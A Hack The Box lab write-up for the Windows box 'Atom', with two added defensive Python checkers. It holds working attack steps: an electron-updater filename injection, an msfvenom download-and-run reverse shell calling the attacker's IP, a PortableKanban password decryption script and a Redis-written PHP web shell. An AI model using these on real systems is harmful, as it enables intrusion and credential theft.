
Hack The Box - Atom

✍️ sckull

Atom features an Electron application. We exploited a vulnerability in an update module that allowed command execution through an update file, combined with access to the update server. We obtained credentials through Portable Kanban, which gave us access to Redis, where we found the administrator's password. We also used Redis to write a web shell that gave us privileged access.

Name: Atom
OS: Windows
Points: 30
Difficulty: Medium
IP: 10.10.10.237
Maker: MrR3boot

Matrix (radar chart, recovered from the page's chart data): categories Enumeration, Real-Life, CVE, Custom Exploitation, CTF-Like. User rate: 6.1, 4.7, 4.8, 5.2, 5.3. Maker rate: 6, 10, 5, 5, 0.

NMAP

A port scan with nmap shows http (80), RPC (135), https (443), samba (445) and redis (6379) open.

# Nmap 7.91 scan initiated Wed May  5 19:48:52 2021 as: nmap -p- --min-rate 10000 -oN allports -Pn 10.10.10.237
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.14s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
6379/tcp open  redis

# Nmap done at Wed May  5 19:49:30 2021 -- 1 IP address (1 host up) scanned in 38.47 seconds
# Nmap 7.91 scan initiated Wed May  5 19:50:09 2021 as: nmap -Pn -p80,135,443,445,6379 -sV -sC -oN serviceports 10.10.10.237
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.069s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
6379/tcp open  redis        Redis key-value store
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m27s, deviation: 4h02m30s, median: 10m26s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-05T17:00:56-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-06T00:00:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May  5 19:51:07 2021 -- 1 IP address (1 host up) scanned in 57.87 seconds

RPC

We used rpcclient with a null session, but we have no access permissions.

λ  ~  rpcclient -U '' -N 10.10.10.237
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

ENUM HTTP

We found a web page on port 80 presenting the Heed software, version 1.0.0.

GOBUSTER

Gobuster showed the same results for http (80) and https (443).

λ  ~/htb/atom  gobuster dir -u http://atom.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 50 -x php,html,txt,xml
/index.html           (Status: 200) [Size: 7581]
/images               (Status: 301) [Size: 330] [--> http://atom.htb/images/]
/Images               (Status: 301) [Size: 330] [--> http://atom.htb/Images/]
/releases             (Status: 301) [Size: 332] [--> http://atom.htb/releases/]
/Index.html           (Status: 200) [Size: 7581]
/examples             (Status: 503) [Size: 398]
/licenses             (Status: 403) [Size: 417]
/IMAGES               (Status: 301) [Size: 330] [--> http://atom.htb/IMAGES/]
/%20                  (Status: 403) [Size: 298]
/INDEX.html           (Status: 200) [Size: 7581]
/Releases             (Status: 301) [Size: 332] [--> http://atom.htb/Releases/]
/server-status        (Status: 403) [Size: 417]

λ  ~/htb/atom  gobuster dir -u https://atom.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 50 -x php,html,txt,xml -k
/images               (Status: 301) [Size: 332] [--> https://atom.htb/images/]
/index.html           (Status: 200) [Size: 7581]
/Images               (Status: 301) [Size: 332] [--> https://atom.htb/Images/]
/releases             (Status: 301) [Size: 334] [--> https://atom.htb/releases/]
/Index.html           (Status: 200) [Size: 7581]
/examples             (Status: 503) [Size: 399]
/licenses             (Status: 403) [Size: 418]
/IMAGES               (Status: 301) [Size: 332] [--> https://atom.htb/IMAGES/]
/%20                  (Status: 403) [Size: 299]
/INDEX.html           (Status: 200) [Size: 7581]
/Releases             (Status: 301) [Size: 334] [--> https://atom.htb/Releases/]
/server-status        (Status: 403) [Size: 418]

HEED

We found a zip file containing the software presented on the page; extracting it gives an executable.

λ  ~/htb/atom/tmp  ls
 heed_setup_v1.0.0.zip  'heedv1 Setup 1.0.0.exe'

The executable appears to be an installer; with winrar we extracted its files, which belong to an application written in Electron.

We see a yaml file (app-update.yml) containing an address that is apparently used to update the application.

provider: generic
url: 'http://updates.atom.htb'
publisherName:
  - HackTheBox

The application only creates and deletes notes, and checks for updates on startup.

HEED CODE

Using npx on the app.asar file we obtained the source code. We found no database addresses; the application only works locally and keeps its data temporarily.

# extract
npx asar extract app.asar app_extract

We see that it uses a module to “update” the application: electron-updater - ^2.23.3.

{
  "name": "heedv2",
  "version": "2.0.0",
  "main": "main.js",
  "description": "Open Source Application provided by HackTheBox",
  "author": "MrR3boot",
  "dependencies": {
    "electron-log": "^1.3.0",
    "electron-updater": "^2.23.3",
    "url": "^0.11.0"
  }
}

ENUM SAMBA

CME

We used this tool to get information from the SAMBA service with a null session. We see the shared resources, and we have permissions on the Software_Updates share.

λ  ~/htb/atom  cme smb --shares atom.htb -u 'null' -p 'null'
SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\null:null
SMB         10.10.10.237    445    ATOM             [+] Enumerated shares
SMB         10.10.10.237    445    ATOM             Share           Permissions     Remark
SMB         10.10.10.237    445    ATOM             -----           -----------     ------
SMB         10.10.10.237    445    ATOM             ADMIN$                          Remote Admin
SMB         10.10.10.237    445    ATOM             C$                              Default share
SMB         10.10.10.237    445    ATOM             IPC$                            Remote IPC
SMB         10.10.10.237    445    ATOM             Software_Updates READ,WRITE
λ  ~/htb/atom

SMBCLIENT

With smbclient we enumerated the share, where we see a pdf file.

λ  ~/htb/atom  smbclient \\\\atom.htb\\Software_updates -u '' -p ''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May  6 02:17:47 2021
  ..                                  D        0  Thu May  6 02:17:47 2021
  client1                             D        0  Thu May  6 02:17:47 2021
  client2                             D        0  Thu May  6 02:17:47 2021
  client3                             D        0  Thu May  6 02:17:47 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021

		4413951 blocks of size 4096. 1262822 blocks available
smb: \>

The file is the QA team's documentation … it mentions that before releasing a new version the team runs tests, and for that the update must be placed in the “client” folders, which we found in the Software_Updates share, although it does not specify whether it has to be an executable file.

Heedv1.0
Internal QA Documentation

What is Heed ?
Note taking application built with electron-builder which helps users in taking important
notes.

Features ?
Very limited at the moment. There’s no server interaction when creating notes. So
currently it just acts as a one-tier thick client application. We are planning to move it to a
full fledged two-tier architecture sometime in the future releases.

What about QA ?
We follow the below process before releasing our products.
1. Build and install the application to make sure it works as we expect it to be.
2. Make sure that the update server running is in a private hardened instance. To
initiate the QA process, just place the updates in one of the "client" folders, and 
the appropriate QA team will test it to ensure it finds an update and installs it
correctly.
3. Follow the checklist to see if all given features are working as expected by the
developer.

JASON - USER

RCE - ELECTRON-UPDATER

We searched for vulnerabilities in Electron Updater and found a post explaining that with a .yml file it is possible to run an exe and commands by modifying the url and path values. As for the exe, a name containing a single quote, v’ulnerable-app-setup-1.2.3.exe, gets executed; to run commands, the command is placed between two quotes inside the name: v';calc;'ulnerable-app-setup-1.2.3.exe.

#latest.yml
version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

After several modifications to latest.yml we managed to run our shell by changing the file name.

version: 6.1.0
files:
- url: http://10.10.14.18/pay'load.exe
  sha512: 0wdfkI8aLN9XrsK/JpYCtxTnvnPi3+ezGGIU72KpGCzEaANmsQh7/ohmRNDHFyxnr/OIqWLa6wqr72l1rMd3xg==
  size: 73802
path: pay'load.exe
sha512: 0wdfkI8aLN9XrsK/JpYCtxTnvnPi3+ezGGIU72KpGCzEaANmsQh7/ohmRNDHFyxnr/OIqWLa6wqr72l1rMd3xg==
releaseDate: '2021-05-05T11:17:02.627Z'

# Reverse shell: append the invocation to a local copy of nishang's Invoke-PowerShellTcp.ps1
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 1338" >> nishang.ps1
# EXE that downloads and runs the script
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/nishang.ps1')\"" -f exe -o payload.exe
# Rename first: the quoted name is the one latest.yml references and the one that gets hashed
mv payload.exe "pay'load.exe"
# SHA512 in the form electron-builder expects: base64 of the raw digest bytes
shasum -a 512 "pay'load.exe" | cut -d " " -f1 | xxd -r -p | base64 | tr -d "\n"
# Serve latest.yml and the binary
python3 -m http.server 80

To run commands, they are appended to the file name.

# mv payload.exe "pay';nslookup test.local 10.10.14.18;'load.exe"
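As an added defensive example (not code from the original post or from the Heed project), the following Python shows the checks an update pipeline could run over a latest.yml before serving it: a strict allowlist for artifact names that rejects quotes and shell metacharacters like the ones used above, an origin check on absolute urls, and verification that every sha512 matches an artifact the release process actually produced. The parser only understands the flat layout shown in this section; the manifests, the installer bytes and the update host updates.atom.htb are constructed for the example.

```python
import base64
import hashlib
import re
from urllib.parse import urlparse

# Artifact names an update manifest may reference: letters, digits, spaces, dots, dashes
# and underscores, ending in .exe. Quotes and shell metacharacters are rejected outright.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._ -]+\.exe$")


def sha512_b64(data):
    """electron-builder stores digests as base64 of the raw SHA-512 bytes."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode()


def parse_latest_yml(text):
    """Minimal parser for the flat latest.yml layout: top-level scalars plus a
    `files:` list of url/sha512/size mappings. Not a general YAML parser."""
    manifest = {"files": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line == "files:":
            current = None
            continue
        if line.startswith("- "):              # new entry in the files list
            current = {}
            manifest["files"].append(current)
            line = line[2:].strip()
            target = current
        elif raw[:1].isspace() and current is not None:
            target = current                   # continuation of the current entry
        else:
            current = None
            target = manifest                  # back to top-level keys
        key, _, value = line.partition(":")
        target[key.strip()] = value.strip().strip("'\"")
    return manifest


def validate_manifest(text, update_host, published):
    """published: {artifact name: bytes} that the release process actually produced.
    Returns a list of findings; an empty list means the manifest may be served."""
    manifest = parse_latest_yml(text)
    findings = []
    entries = []
    for f in manifest["files"]:
        url = f.get("url", "")
        parsed = urlparse(url)
        if parsed.scheme:                       # absolute URL: must stay on our host over TLS
            if parsed.scheme != "https" or parsed.hostname != update_host:
                findings.append(f"url leaves the update host: {url}")
            entries.append((parsed.path.rsplit("/", 1)[-1], f))
        else:
            entries.append((url, f))
    if manifest.get("path"):
        entries.append((manifest["path"], manifest))
    for name, entry in entries:
        if not SAFE_NAME.match(name):
            findings.append(f"unsafe artifact name: {name!r}")
            continue
        data = published.get(name)
        if data is None:
            findings.append(f"artifact was never published: {name}")
        elif entry.get("sha512") != sha512_b64(data):
            findings.append(f"sha512 mismatch for {name}")
    return findings


# Constructed samples: a legitimate release and the quoted-name manifest shape from the post.
GOOD_NAME = "heedv1 Setup 1.0.1.exe"
GOOD_BYTES = b"MZ constructed installer bytes for this example\n"
GOOD_MANIFEST = f"""version: 1.0.1
files:
  - url: {GOOD_NAME}
    sha512: {sha512_b64(GOOD_BYTES)}
    size: {len(GOOD_BYTES)}
path: {GOOD_NAME}
sha512: {sha512_b64(GOOD_BYTES)}
releaseDate: '2021-05-05T11:17:02.627Z'
"""
BAD_MANIFEST = """version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
    sha512: PLACEHOLDER-not-a-real-digest==
    size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: PLACEHOLDER-not-a-real-digest==
releaseDate: '2019-11-20T11:17:02.627Z'
"""

if __name__ == "__main__":
    print(validate_manifest(GOOD_MANIFEST, "updates.atom.htb", {GOOD_NAME: GOOD_BYTES}))
    print(validate_manifest(BAD_MANIFEST, "updates.atom.htb", {}))
```

The name allowlist deliberately permits spaces because the legitimate installer is called `heedv1 Setup 1.0.0.exe`; what it never permits is a quote or a `;`, which is exactly what the technique above relies on. Such a check belongs on the publishing side, alongside updating the electron-updater dependency, and does not replace the signature verification the updater performs itself.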

We got our shell as user Jason and the flag user.txt.

λ  ~/htb/atom  nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.18] from atom.htb [10.10.10.237] 61151
Windows PowerShell running as user jason on ATOM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>whoami
atom\jason
PS C:\WINDOWS\system32> type C:\Users\jason\Desktop\user.txt
13b9e357b45b1e0b0ff69bb4a5ee573c
PS C:\WINDOWS\system32>

PRIVILEGE ESCALATION

PORTABLE KANBAN

Enumerating Jason's folders we found PortableKanban; in the configuration file PortableKanban.cfg we found an encrypted password.

PS C:\Users\Jason\Downloads\portablekanban> cat C:\Users\Jason\Downloads\portablekanban\PortableKanban.cfg
{"RoamingSettings":{"DataSource":"RedisServer","DbServer":"localhost","DbPort":6379,"DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb","DbServer2":"","DbPort2":6379,"DbEncPassword2":"","DbIndex":0,"DbSsl":false,[... REDACTED ... ]}
PS C:\Users\Jason\Downloads\portablekanban>

We also found an exploit that let us recover the password in plaintext.

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
import base64
from des import DesKey  # python3 -m pip install des

def decode(encrypted):
  # The application uses a fixed DES key and IV, so any stored DbEncPassword is recoverable
  data = base64.b64decode(encrypted.encode('utf-8'))
  key = DesKey(b"7ly6UznJ")
  return key.decrypt(data, initial=b"XuVUm5fR", padding=True).decode('utf-8')

print(decode("Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb")) # kidvscat_yes_kidvscat

REDIS

We used the password with redis-cli since port 6379 is open. We found an encrypted password in one of the KEYS for the “user” Administrator and used the exploit again to recover the plaintext.

λ  ~/htb/atom/wwww  redis-cli -h 10.10.10.237 -a "kidvscat_yes_kidvscat"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> ping
PONG
10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:User"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379> get pk:ids:MetaDataClass
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379> get pk:ids:User
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"
(0.54s)
10.10.10.237:6379>

We verified it with crackmapexec: it is the Administrator password and we have full access.

λ  ~/htb/atom/wwww  cme smb -u Administrator -p "kidvscat_admin_@123" --shares 10.10.10.237
SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\Administrator:kidvscat_admin_@123 (Pwn3d!)
SMB         10.10.10.237    445    ATOM             [+] Enumerated shares
SMB         10.10.10.237    445    ATOM             Share           Permissions     Remark
SMB         10.10.10.237    445    ATOM             -----           -----------     ------
SMB         10.10.10.237    445    ATOM             ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.237    445    ATOM             C$              READ,WRITE      Default share
SMB         10.10.10.237    445    ATOM             IPC$                            Remote IPC
SMB         10.10.10.237    445    ATOM             Software_Updates READ,WRITE
λ  ~/htb/atom/wwww

WINRM

For some reason the winrm port did not show up in nmap; we used this port to get a shell and our root.txt flag.

λ  ~/htb/atom/wwww  evil-winrm -i 10.10.10.237 -u Administrator -p "kidvscat_admin_@123"

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          5/6/2021   4:43 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50448bb96c0c36cbc2b89e9bebff9588
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

REDIS TO ROOT

We also managed to run commands through Redis, by modifying the redis configuration to write a web shell, similar to Postman - HTB.

λ  ~/htb/atom  redis-cli -h 10.10.10.237 -a "kidvscat_yes_kidvscat"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> config set dbfilename redis.php
OK
10.10.10.237:6379> set test "<?php echo(system($_GET['cmd'])); ?>"
OK
10.10.10.237:6379> save
OK
10.10.10.237:6379>
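As an added example, not from the original post, the Python below audits a redis.conf for the settings that make this file write reachable (an instance bound on all interfaces, protected mode off, a weak or missing requirepass, CONFIG and SAVE left under their default names, and a snapshot directory under a web root) and scans MONITOR output for the CONFIG SET dir/dbfilename followed by SAVE sequence seen in the session above. Both configuration fragments and the MONITOR lines are constructed for the example and are not the box's real files. A strong requirepass alone would not have helped here, since the password was recoverable from the Kanban client; the checks that matter are disabling CONFIG and SAVE for clients and keeping the snapshot directory out of the web root.

```python
import re

# Constructed redis.conf fragments for the example (not the box's real configuration).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
requirepass changeme
dir C:/xampp/htdocs
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass PLACEHOLDER_LONG_RANDOM_SECRET
dir C:/redis/data
dbfilename dump.rdb
rename-command CONFIG ""
rename-command SAVE ""
"""

# Constructed MONITOR output in Redis' own format: <ts> [<db> <addr>] "arg" "arg" ...
MONITOR_SAMPLE = [
    '1620252000.100000 [0 10.10.14.18:51234] "config" "set" "dbfilename" "redis.php"',
    '1620252001.200000 [0 10.10.14.18:51234] "set" "test" "<constructed payload>"',
    '1620252002.300000 [0 10.10.14.18:51234] "save"',
    '1620252003.400000 [0 127.0.0.1:40000] "get" "pk:ids:User"',
]

# Path fragments that mean the RDB snapshot would land somewhere a web server serves.
WEB_ROOTS = ("htdocs", "inetpub", "wwwroot", "public_html")


def parse_redis_conf(text):
    """Parse the `directive value` layout of redis.conf. rename-command lines are
    collected separately as command -> new name, where "" means disabled."""
    conf = {"rename-command": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "rename-command":
            cmd, _, new_name = value.partition(" ")
            conf["rename-command"][cmd.upper()] = new_name.strip().strip('"')
        else:
            conf[key] = value.strip('"')
    return conf


def audit_redis_conf(text):
    """Return the weaknesses that make a CONFIG SET + SAVE file write feasible or
    reachable; an empty list means none of the checked settings is weak."""
    conf = parse_redis_conf(text)
    findings = []
    bind = conf.get("bind", "")
    if not bind or "0.0.0.0" in bind or "*" in bind:
        findings.append("bind: instance reachable on all interfaces")
    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")
    if len(conf.get("requirepass", "")) < 16:
        findings.append("requirepass: missing or too short to resist guessing")
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in conf["rename-command"]:
            findings.append(f"{cmd}: command still reachable under its default name")
    if any(root in conf.get("dir", "").lower() for root in WEB_ROOTS):
        findings.append("dir: snapshots are written under a web-served directory")
    return findings


MONITOR_RE = re.compile(r'^[\d.]+ \[\d+ (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def detect_rdb_write_abuse(monitor_lines):
    """Flag clients that retarget the snapshot (CONFIG SET dir/dbfilename) and then
    force a SAVE/BGSAVE. Returns [(client, ["setting=value", ...]), ...]."""
    pending = {}
    hits = []
    for line in monitor_lines:
        m = MONITOR_RE.match(line)
        if not m:
            continue
        args = ARG_RE.findall(m.group("args"))
        if not args:
            continue
        client, cmd = m.group("client"), args[0].lower()
        if (cmd == "config" and len(args) >= 4 and args[1].lower() == "set"
                and args[2].lower() in ("dir", "dbfilename")):
            pending.setdefault(client, []).append(f"{args[2].lower()}={args[3]}")
        elif cmd in ("save", "bgsave") and client in pending:
            hits.append((client, pending.pop(client)))
    return hits


if __name__ == "__main__":
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
    print("monitor:", detect_rdb_write_abuse(MONITOR_SAMPLE))
```

The MONITOR-based detector is only practical for a short investigation window, since MONITOR is expensive on a busy instance; the same sequence can be caught from the Redis log when `dir` or `dbfilename` changes unexpectedly, or from file-integrity monitoring on the web root.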

We also found the KEYS in our webshell output.

λ  ~/htb/atom/wwww  curl -sX GET "http://atom.htb/redis.php?cmd=whoami%20/all" -o out.txt; cat out.txt
REDIS0006
         pk:ids:User$e8e29158-d70d-44b1-a1ba-4949d52790a0�9pk:urn:metadataclass:f-@�ff��J{"Id":"f�","SchemaVersion 24.2.0.0�Modifie@T\/Date(1617420120 -0700)\/�6By Ze8e29158d70d44b1a1ba4949d52790a�sCheck�r    -621355968 r@t �
                                        t7`s !� TimeStamp":637530169345346438}test$
USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Disabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

52790a0","Name )29158-d70d-44b1-a1ba-4949d52790a0���{"Id":"e8e29158d70d44b1a1ba4949d
Email           Administrator Initials
ncryptedPasswor@fOdh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi ARol�f Inactiv f de,"TimeStamp":637530169606440253}pk:ids:MetaDataClass�$ff-@�ffs-key$
[ ... REDACTED ... ]

λ  ~/htb/atom/wwww

REDIS PROCESS

With the shell we got through WINRM we found that redis-server is being run by the administrator, which is why we were able to run privileged commands in REDIS TO ROOT.

*Evil-WinRM* PS C:\xampp\htdocs> Get-Process -Name redis-server -IncludeUserName

Handles      WS(K)   CPU(s)     Id UserName               ProcessName
-------      -----   ------     -- --------               -----------
    126      20628     0.61   7712 NT AUTHORITY\NETWOR... redis-server

Written by sckull (Dany Sucuc), RedTeamer & Pentester wannabe